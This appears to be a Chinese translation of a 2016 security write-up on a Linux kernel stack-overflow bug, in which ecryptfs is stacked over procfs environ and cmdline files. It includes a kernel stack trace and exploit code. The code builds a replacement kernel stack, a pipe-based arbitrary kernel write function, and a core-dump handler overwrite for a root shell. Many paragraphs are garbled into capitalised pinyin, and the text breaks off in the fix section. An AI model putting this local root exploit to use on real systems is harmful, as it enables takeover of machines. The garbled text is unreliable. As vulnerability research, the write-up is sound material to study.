
Linux内核中的递归漏洞利用

发布日期:2016-06-30 22:25:39

背景知识

Linux系统中,用户态的栈空间通常大约是8MB。如果有程序发生了栈溢出的话(比如无限递归),栈所在的内存保护页一般会捕捉到。

Linux内核栈(可以用来处理系统调用)和用户态的栈很不一样。内核栈相对来说更短:32位x86架构平台为4096byte , 64位系统则有16384byte(内核栈大小由THREAD_SIZE_ORDER 和 THREAD_SIZE 确定)。它们是由内核的伙伴内存分配器分配,伙伴内存分配器是内核常用来分配页大小(以及页大小倍数)内存的分配器,它不创建内存保护页。也就是说,如果内核栈溢出的话,它将直接覆盖正常的数据。正因如此,内核代码必须(通常也是)在栈上分配大内存的时候非常小心,并且必须阻止过多的递归。

Linux上的大多数文件系统既不用底层设备(伪文件系统,比如sysfs, procfs, tmpfs等),也不用块设备(一般是硬盘上的一块)作为备用存储设备。然而, ecryptfs 和overlayfs是例外。这两者是堆叠的文件系统,这种文件系统会使用其他文件系统上的文件夹作为备用存储设备(overlayfs则使用多个不同文件系统上的多个文件作为备用存储设备)。被用作备用存储设备的文件系统称为底层文件系统,其上的文件称为底层文件。这种层叠文件系统的特点是它或多或少的会访问底层文件系统,并对访问的数据做一些修改。 Overlayfs融合多个文件系统,ecryptfs则进行了相应的加密。

CENGDIEWENJIANXITONGSHIJISHANGCUNZAIQIANZAIFENGXIAN,YINWEIQIFANGWENXUNIWENJIANXITONGDEHANSHUCHANGHUIFANGWENDAODICENGWENJIANXITONGDEHANSHU,XIANGJIAOZHIJIEFANGWENDICENGWENJIANXITONGDEJUBING,ZHEIHUIZENGDAZHANKONGJIAN。KAOLVZHEIYANGYIGECHANGJING:RUGUOYONGCENGDIEWENJIANXITONGZUOWEILINGWAIYIGECENGDIEXITONGDEBEIYONGCUNCHUSHEBEI,YOUYUMEIYICENGWENJIANXITONGDEDUIDIEDOUZENGDALEZHANKONGJIAN,NEIHEZHANJIUHUIZAIMOUXIEQINGKUANGXIAYICHU。DANSHI,SHEZHIFILESYSTEM_MAX_STACK_DEPTH XIANZHIWENJIANXITONGDECENGSHU,ZHIYUNXUZUIDUOLIANGCENGCENGDIEWENJIANXITONGFANGZAIFEICENGDIEWENJIANXITONGSHANG,JIUKEYIBIMIANZHEIGEWENTI。

在procfs伪文件系统上,系统中运行的每一个进程都有一个文件夹,每个文件夹包含一些描述该进程的文件。值得注意的是每个进程的“mem”,“environ”和“cmdline”文件,因为访问这些文件会同步访问目标进程的虚拟内存。这些文件显示了不同的虚拟内存地址范围:

 

1.“mem”文件显示了整个虚拟内存地址范围(需要PTRACE_MODE_ATTACH权限)

2.“environ”文件显示了mm->env_start到mm->env_end的内存范围(需要PTRACE_MODE_READ权限)

3.“cmdline”文件显示了mm->arg_start到mm->arg_end的地址范围(如果mm->arg_end的前一个字符是null的话)

如果可以用mmap()函数映射“mem”文件的话(啥意义也没有,别想太多),就可以映射成如下图所示的样子:

 


接下来,假设/proc/$pid/mem的映射有一些错误,那么在进程C里的内存读取错误,将会导致从进程B中映射的内存出错,进而导致进程B里出现其他的内存错误,进而导致从A进程映射的内存出错,这就是一个递归内存错误。

可是,现实中这是不可行的,“mem”,“environ”,“cmdline”文件只能用VFS函数读写,mmap无法使用:

 

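/*
 * procfs "cmdline": only .read and .llseek are wired up. There is no .mmap
 * member, which is why this file can be read through the VFS but never
 * mapped directly.
 */
static const struct file_operations proc_pid_cmdline_ops = {
	.read   = proc_pid_cmdline_read,
	.llseek = generic_file_llseek,
};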

[...]

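/*
 * procfs "mem": read/write/seek plus open/release, again without an .mmap
 * member. Access goes through mem_read()/mem_write() and the permission
 * checks they perform; the file cannot be mapped.
 */
static const struct file_operations proc_mem_operations = {
	.llseek  = mem_lseek,
	.read    = mem_read,
	.write   = mem_write,
	.open    = mem_open,
	.release = mem_release,
};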

[...]

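/*
 * procfs "environ": read-only (no .write) and, like the other two, no .mmap
 * member. environ_read() is the only path that touches the target's memory.
 */
static const struct file_operations proc_environ_operations = {
	.open    = environ_open,
	.read    = environ_read,
	.llseek  = generic_file_llseek,
	.release = mem_release,
};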

 

XIANGGUANecryptfsWENJIANXITONG,BIJIAOYOUQUDEYIGEXIJIEZAIYUTAZHICHImmap()。YONGHUKANDAODENEICUNYINGSHEBIXUSHIJIEMIDE,ERDICENGWENJIANXITONGDENEICUNYINGSHESHIJIAMIDE,YINERecryptfs WENJIANXITONGBUNENGJIANGmmap()HANSHUZHIJIEYINGSHEDAODICENGWENJIANXITONGDEmmap()HANSHUSHANG。Ecrypt WENJIANXITONGZAINEICUNYINGSHESHISHIYONGLEZIJIDEYEHUANCUN。

ecryptfs文件系统处理页错误的时候,必须以某种方式读取底层文件系统上加密的页。这可以通过读取底层文件系统的页缓存(使用底层文件系统的mmap函数)来实现,但是这样比较消耗内存。于是它直接使用底层文件系统的VFS读取函数(通过kernel_read()),这样做更加直接有效,但是这个做法有副作用,就是有可能会mmap()到通常不能映射的解密后的文件(因为只要底层文件有读权限并且包含合法的加密数据,ecryptfs文件系统的mmap函数就能工作)。

漏洞分析

在此,我们就能描绘完整的攻击方式了。首先创建一个进程A,进程号为$A。然后创建一个ecryptfs挂载/tmp/$A,使/proc/$A作为它的底层文件系统(ecryptfs应该只有一个key,这样文件名才不会被加密)。现在,如果/proc/$A下相应的文件有合法的ecryptfs文件头的话,那么/tmp/$A/mem,/tmp/$A/environ和/tmp/$A/cmdline就可以被映射。除非有root权限,否则无法将内存映射到进程A的0×0处,也就是/proc/$A/mem的开头。因此从开始读取/proc/$A总是会返回-EIO,而且/proc/$A/mem不会有一个合法的ecryptfs文件头。如此,environ和cmdline文件才有攻击的可能性。

ZAISHIYONGCONFIG_CHECKPOINT_RESTOREBIANYIDENEIHE(ZHISHAOSHIUbuntuDE distro NEIHE)ZHONG,FEITEQUANYONGHUKEYITONGGUOprctl(PR_SET_MM, PR_SET_MM_MAP, &mm_map,sizeof(mm_map), 0)SHEZHImm_struct ZHONGDE arg_start, arg_end, env_start HE env_endZHI。ZHEISHIDEYINGSHE /proc/$A/environ HE /proc/$A/cmdlineDAORENYIXUNINEICUNFANWEICHENGWEIKENENG。(BUZHICHIcheckpoint-restoreDENEIHEZHONG,GONGJIGUOCHENGJIUSHAOWEIYOUDIANMAFAN,DANSHIYONGSUOXUDECANSHUQUYUHEHUANJINGBIANLIANGDEZHANGDUZHONGXINZHIXING,RANHOUQUDAIBUFENZHANKONGJIANDEYINGSHE,HAISHIYOUKENENGDE。)

RUGUOYIGEYOUXIAOJIAMIDEecryptfsWENJIANBEIJIAZAIDAOJINCHENGADENEICUNZHONG,BINGQIETADEHUANJINGBIANLIANGYEBEIPEIZHIWEIZHIXIANGZHEIKUAIQUYU,NEIMEHUANJINGBIANLIANGQUYULIDEJIEMIXINGSHIDESHUJUJIUKEYIZAI /tmp/$A/environWENJIANZHONGHUOQU。ZHEIGEWENJIANYEKEYIBEIYINGSHEDAOJINCHENGBDENEICUNZHONG。WEILENENGGOUZHONGFUGAIJINCHENG,MOUXIESHUJUXUYAOFANFUJIAMI,JINERCHUANGJIANYIGEJIAMIDEmatroska WENJIAN,BINGJIANGZHEIGEWENJIANJIAZAIDAOJINCHENG ADENEICUNZHONG。ZHEIYANGYILAI,YINGSHEHUXIANGJINCHENGJIEMIHUANJINGBIANLIANGQUYUDEJINCHENGLIANJIUJIANLIQILAILE:

 

 

 

 

 

如果映射到进程C和进程B的内存相应范围内没有数据,进程C 中的内存错误(这个内存错误可能是用户空间产生也可能是由于用户空间访问内核空间,比如通过copy_from_user()函数)将会导致ecryptfs读取 /proc/$B/environ ,进而导致进程B中的内存错误,接下来导致ecryptfs读取 /proc/$A/environ ,最后导致进程A中的进程错误。如此循环往复,最终溢出内核栈,使内核崩溃。内核栈如下:

 

[...]

[<ffffffff811bfb5b>]handle_mm_fault+0xf8b/0x1820

[<ffffffff811bac05>]__get_user_pages+0x135/0x620

[<ffffffff811bb4f2>]get_user_pages+0x52/0x60

[<ffffffff811bba06>]__access_remote_vm+0xe6/0x2d0

[<ffffffff811e084c>]? alloc_pages_current+0x8c/0x110

[<ffffffff811c1ebf>]access_remote_vm+0x1f/0x30

[<ffffffff8127a892>]environ_read+0x122/0x1a0

[<ffffffff8133ca80>]? security_file_permission+0xa0/0xc0

[<ffffffff8120c1a8>]__vfs_read+0x18/0x40

[<ffffffff8120c776>]vfs_read+0x86/0x130

[<ffffffff812126b0>]kernel_read+0x50/0x80

[<ffffffff81304d53>]ecryptfs_read_lower+0x23/0x30

[<ffffffff81305df2>]ecryptfs_decrypt_page+0x82/0x130

[<ffffffff813040fd>]ecryptfs_readpage+0xcd/0x110

[<ffffffff8118f99b>]filemap_fault+0x23b/0x3f0

[<ffffffff811bc120>]__do_fault+0x50/0xe0

[<ffffffff811bfb5b>]handle_mm_fault+0xf8b/0x1820

[<ffffffff811bac05>]__get_user_pages+0x135/0x620

[<ffffffff811bb4f2>]get_user_pages+0x52/0x60

[<ffffffff811bba06>]__access_remote_vm+0xe6/0x2d0

[<ffffffff811e084c>]? alloc_pages_current+0x8c/0x110

[<ffffffff811c1ebf>]access_remote_vm+0x1f/0x30

[<ffffffff8127a892>]environ_read+0x122/0x1a0

[...]

 

GUANYUZHEIGELOUDONGDEKELIYONGXING:LIYONGGAILOUDONG,XUYAONENGGOUGUAZAI/proc/$pidWEIecryptfsWENJIANXITONG。ANZHUANGWANecryptfs-utilsBAOZHIHOU(RUGUOANZHUANGUbuntuSHIXUANZELEhomeMULUJIAMI, Ubuntu HUIZIDONGANZHUANG),SHIYONG /sbin/mount.ecryptfs_SIYOUDEsetuidFUZHUHANSHUJIUKEYIZUODAOZHEIYIDIAN。

漏洞利用

JIEXIALAIDEMIAOSHUSHIPINGTAIXIANGGUANDE,ZHEILIZHIamd64。

YIQIANYAOLIYONGZHEIYILEILOUDONGHAISHIXIANGDANGJIANDANDE,KEYIZHIJIEFUGAIZHANDIDEthread_infoJIEGOUTI,YONGHESHIDESHUZHIZHONGXIErestart_blockHUOZHE addr_limit,RANHOUGENJUSUOYONGFANGSHI,XUANZEZHIXINGYONGHUKONGJIANYINGSHEDEDAIMA,HAISHIYONGcopy_from_user() HE copy_to_user() ZHIJIEDUXIENEIHESHUJU。

但是,restart_block已经从thread_info结构体中移除,并且由于栈溢出触发时栈中有kernel_read()的栈帧,所以addr_limit已经是KERNEL_DS,而且函数退出时将会重置成USER_DS。另外,Ubuntu 16.04以后的内核都打开了CONFIG_SCHED_STACK_END_CHECK内核配置选项。打开这个选项以后,每次调度到这个线程时,thread_info结构体上方的金丝雀值都会被检查;如果金丝雀值不正确的话,内核递归就会出错然后崩溃。

YOUYUthread_infoJIEGOUTIZHONGHENNANZHAODAOYOUJIAZHIDEGONGJIMUBIAO(TONGSHIYICHUthread_infoZHONGDESHUJUBINGFEIYOUXIAODEHUANJIECUOSHI),WOJIUXUANZELEQITAFANGSHI:YICHUZHANDAOZHANZHIQIANDEKONGJIAN,RANHOULIYONGZHANHEQITANEICUNKONGJIANZHIJIANHUIZHONGHEZHEIYIDIAN。ZHEIZHONGFANGSHIDEWENTIJIUSHIYIDINGYAOBAOZHENGJINSIQUEZHIHE thread_infoJIEGOUZHONGDEQITACHENGYUANBUBEIFUGAI。ZHANYICHUDENEICUNBUJURUXIASUOSHI(LVSEBIAOSHIKEYIFUGAI,HONGSEBIAOSHIBUNENGFUGAI,HUANGSEBIAOSHIFUGAIHOUKENENGHUIYOUWENTI):

 

 

 

 

 

 

 

 

幸运的是,有些栈帧中存在空洞(如果递归的最底部采用cmdline而不是environ),递归的过程中就会有一个5个qword的空洞没有被访问到。这些空洞足够用来存放从STACK_END_MAGIC到flags的所有数据。这一点可以通过一个安全递归和一个内核调试模块来实现,这个内核调试模块将栈中的所有空洞标绿便于观察:

 

 

 

 

 

 

 

 

JIEXIALAIDEWENTISHIKONGDONGZHIHUICHUXIANZAITEDINGDEWEIZHI,ERLOUDONGLIYONGJIUXUYAOKONGDONGZAIZHUNQUEDEWEIZHICHUXIAN。XIAMIANYOUYIXIEJIQIAOKEYIYONGLAIDUIQIZHANKONGJIAN:

 

1.ZAIMEIGEDIGUICENGSHANGDOUKEYIXUANZE“environ”WENJIANHUOZHE“cmdline”WENJIAN,TAMENDEZHANZHENDAXIAOHEKONGDONGMOSHIDOUBUYIYANG。

2.RENHEDIAOYONGcopy_from_user()DOUHUIDAOZHINEICUNCUOWU。SHENZHIKEYIJIANGXIERUXITONGDIAOYONGHEVFSXIERUJUBINGJIEHEQILAI,SUOYIMEIYIGEXIERUXITONGDIAOYONGHE VFSXIERUJUBINGDOUHUIYINGXIANGSHENDU(HEBINGSHENDUKEYIJISUANCHULAI,ERBUYONGCESHIMEIGEBIANLIANG)。

ZAICESHILEGEZHONGZUHEZHIHOU,WOZHAODAOYIZUenvironWENJIANHEcmdlineWENJIAN, HAIYOUwrite ()XITONGDIAOYONGHEJINCHENGDEVFSXIEJUBINGDEZUHE。

SUIHOU,JIUKEYIDIGUIDAOZHIQIANFENPEIDEKONGJIAN,ERBUHUIFUGAIRENHEWEIXIANSHUJULE。RANHOUZANTINGNEIHEXIANCHENGDEZHIXING,CISHIZHANZHIZHENZHIXIANGZHIQIANFENPEIDENEICUNKONGJIAN,ZHEIXIENEICUNKONGJIANYINGGAIYONGXINDEZHANLAIFUGAI,RANHOUJIXUNEIHEXIANCHENGDEZHIXING。

为了暂停递归中内核线程的执行,在建立起映射链后,映射链最后的anonymous映射可以用fuse映射取代(userfaultfd函数并不适用,它不能捕捉远程的内存访问)。

DUIYUXIANQIANFENPEIDENEICUN,WODEexpSHIYONGGUANDAO(Pipes)。DANGXIERUSHUJUDAOXINFENPEIDEKONGGUANDAOSHI,HUOBANNEICUNFENPEIQIHUIFENPEIYIGENEICUNYE,LAICUNFANGZHEIXIESHUJU。WODEexpTONGGUOGUANDAONEICUNYEFENPEILAITIANCHONGDALIANGNEICUN,SUOYISHIYONGclone()CHUANGJIANXINJINCHENGSHIJIUHUICHUFANEICUNCUOWU。ZHEILISHIYONGclone() ERFEIfork(),YINWEIDIAOYONGclone()SHIZHIYAOKONGZHIHAOCANSHU,XITONGJIUHUIFUZHIJIAOSHAODEXINXI,KEYIJIANSHAONEICUNFENPEIDEGANRAO。 Clone( ) HANSHUDIAOYONGGUOCHENGZHONG,SUOYOUDEGUANDAONEICUNYEDOUBEITIANCHONGMAN,CHULEDIYICIBAOCUNDE RIPZHI——DIGUIJINCHENGZANTINGZAIFUSEZHONGSHI,TABAOCUNZAIQIWANGDE RSP ZHIZHIHOU。XIERUJIAOSHAODESHUJUJIUNENGZHISHIDIERGEGUANDAOXIERUMUBIAOZHANSHUJU,ZHEIXIESHUJUZAI RIPKONGZHISHIXIANZHIQIANJIUBEISHIYONG,KENENGHUIDAOZHINEIHEBENGKUI。SUIHOU,DIGUIJINCHENGZAIFUSE ZHONGZANTINGSHI,DIERCIXIANGSUOYOUGUANDAOXIERUSHUJU,HUIFUGAIBAOCUNDE RIPZHIHEQIHOUDESHUJU,GONGJIZHEYEJIUNENGGOUWANQUANKONGZHIQUANXINDEZHANLE。

 

 

 

 

CISHI,ZUIHOUYIDAOFANGXIANJIUSHIKASLRLE。UbuntuZHICHIKASLR ,ZHIBUGUOKASLRXUYAOSHOUDONGKAIQI。ZHEIGEbZUIJINGAIBUGYIJINGXIUFULE,XIANZAIdistrosNEIHEYINGGAISHIMORENJIUKAIQIKASLRDE。SUISHUOZHEIXIANGANQUANTEXINGBANGBUSHANGTAIDADEMANG,DANBIJINGKASLRBUXUYAOZHANYONGTAIDUOZIYUAN,KAIQIZHEIXIANGTEXINGJIUXIANDEXIANGDANGLISUODANGRANLE。YOUYUDADUOSHUDESHEBEIBINGBUZHICHIXIANGNEIHEMINGLINGXINGCHUANSHUTESHUCANSHU,SUOYIZHEILIJIASHEKASLRSUIRANBIANYIJINLENEIHE,DANRENGCHUYUWEIJIHUOZHUANGTAI,GONGJIZHEYEZHIDAONEIHEDAIMAHEJINGTAISHUJUDEDIZHI。

RANHOUJIUKEYIYONGROPZAINEIHELIZUOGEZHONGSHIQINGLE,LOUDONGLIYONGJUTIYOULIANGGEFANGXIANGKEYIJIXU。KEYISHIYONGROPJINXING commit_creds LEISICAOZUO。BUGUOWOYONGLELINGYIGEFANGFA。ZAIZHANYICHUGUOCHENGZHONG,YUANLAIaddr_limitDEKERNEL_DS ZHIBAOCUNLEQILAI。ZHANYICICIFANHUI,ZUIZHONGJIANGHUIBA addr_limit ZHONGZHIWEIUSER_DS。DANRUGUOWOMENZHIJIEFANHUIDAOYONGHUKONGJIAN, addr_limit JIANGBAOCHI KERNEL_DS 。SUOYIWOZHEIYANGGOUZAOXINZHAN,HUODUOHUOSHAOFUZHILEZHANDINGDESHUJU:

 

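/*
 * Replacement kernel stack written over the pre-allocated pages once the
 * recursion has unwound to them. Per the text above it more or less copies
 * what sat at the top of the original stack: the syscall handler's return
 * pointer, sixteen register slots, then the user-mode frame (RIP, CS, EFLAGS,
 * RSP, SS). The first constant is an address in the article's target build
 * (amd64, KASLR compiled in but not active) and is not portable.
 *
 * NOTE(review): the RSP entry adds sizeof(post_corruption_user_stack) to the
 * array name, which only yields "one past the end" if that array has byte-sized
 * elements — confirm its element type.
 */
unsigned long new_stack[] = {
	0xffffffff818252f2, /* return pointer of syscall handler */
	/* 16 useless registers */
	0x1515151515151515, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
	(unsigned long) post_corruption_user_code, /* user RIP */
	0x33,  /* user CS */
	0x246, /* EFLAGS: most importantly, turn interrupts on */
	/* user RSP */
	(unsigned long) (post_corruption_user_stack + sizeof(post_corruption_user_stack)),
	0x2b   /* user SS */
};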

 

杀掉fuse服务进程后,递归进程继续运行到post_corruption_user_code函数上。这个函数可以使用管道向任意内核地址写数据,因为copy_to_user()中的地址检查已经失效。

 

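/*
 * Copy len bytes from buf to addr by bouncing them through a pipe: write()
 * pushes them into the pipe, read() pulls them back out to addr. It only
 * reaches kernel memory because the preceding stack corruption left addr_limit
 * at KERNEL_DS, so the kernel's address check in copy_to_user() no longer
 * rejects a kernel-space destination; on an intact kernel the read() into such
 * an address fails with EFAULT.
 *
 * Exits the process via err()/errx() on any failure. len has to fit in the
 * pipe buffer: nothing drains the pipe while write() runs, so a larger write
 * blocks forever.
 */
void kernel_write(unsigned long addr, char *buf, size_t len) {
	int pipefds[2];
	ssize_t n;

	if (pipe(pipefds))
		err(1, "pipe");
	/* compare through ssize_t so a -1 return is not silently widened */
	n = write(pipefds[1], buf, len);
	if (n < 0 || (size_t)n != len)
		errx(1, "pipe write");
	close(pipefds[1]);
	n = read(pipefds[0], (char *)addr, len);
	if (n < 0 || (size_t)n != len)
		errx(1, "pipe read to kernelspace");
	close(pipefds[0]);
}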

 

现在你就可以在用户态舒服地执行任意读写操作了。如果你想要root shell,可以覆盖coredump函数,它存储在一个静态变量里,然后触发一个SIGSEGV,就可以以root权限执行coredump函数:

 

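 /* Overwrite the static kernel variable holding the core-dump handler with a
  * pipe-style handler string (terminating NUL included). The address is the
  * one from the article's target build and is not portable. */
 char *core_handler = "|/tmp/crash_to_root";
 kernel_write(0xffffffff81e87a60, core_handler, strlen(core_handler) + 1);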

 

漏洞修复

YOULIANGGEDULIDEBUDINGKEYONGYUXIUFUGAIBUG:QIZHONG,2f36db710093 JINZHITONGGUOecryptfsDAKAIMEIYOUmmapHANSHUDEWENJIAN,
